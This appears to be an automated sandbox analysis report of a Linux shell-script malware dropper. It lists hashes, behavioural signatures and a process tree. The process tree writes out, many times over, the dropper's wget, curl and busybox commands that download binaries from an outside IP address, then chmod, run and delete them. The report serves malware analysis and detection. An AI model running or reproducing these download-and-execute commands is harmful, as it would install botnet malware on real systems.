Analysis
-
max time kernel
17s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
01-11-2024 03:33
Static task
static1
Behavioral task
behavioral1
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
-
Size
10KB
-
MD5
01b56d1b9cc005de6042881dafcef1bf
-
SHA1
37f98670c045d4e2627287b76bed156bae8d9a10
-
SHA256
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8
-
SHA512
617294ee58e825e6af28f02ab893ca33b04be9f8b1154d6f335a5b8085e2706046661ab704c92730764d6e1b132af69593e9d054e4fe2a31c9aa326ab52f6ac2
-
SSDEEP
192:qfHqRU7VKbQJxAcqZdGhBu4pHZdGhBNTfHqTY9JxAcp:pS7VKblKLs9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1616 chmod 1538 chmod 1574 chmod 1586 chmod 1514 chmod 1580 chmod 1604 chmod 1622 chmod 1670 chmod 1664 chmod 1544 chmod 1610 chmod 1646 chmod 1592 chmod 1598 chmod 1520 chmod 1556 chmod 1628 chmod 1526 chmod 1568 chmod 1634 chmod 1550 chmod 1562 chmod 1640 chmod 1658 chmod 1508 chmod 1532 chmod 1652 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 1509 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 1515 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 1521 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 1527 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 1533 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 1539 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 1545 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 1551 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 1557 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 1563 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 1569 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 1575 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 1581 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 1587 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 1593 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 1599 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 1605 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 1611 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 1617 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 1623 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 1629 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 1635 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 1641 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 1647 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 1653 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 1659 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 1665 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 1671 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl
Processes
-
/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh1⤵PID:1499
-
/bin/rm/bin/rm bins.sh2⤵PID:1500
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:1501
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:1507
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:1510
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:1513
-
-
/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:1519
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:1525
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:1531
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:1537
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:1543
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:1549
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:1555
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:1561
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:1567
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:1573
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:1579
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:1585
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:1591
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:1597
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:1603
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:1609
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:1615
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:1621
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:1627
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:1633
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:1639
-
-
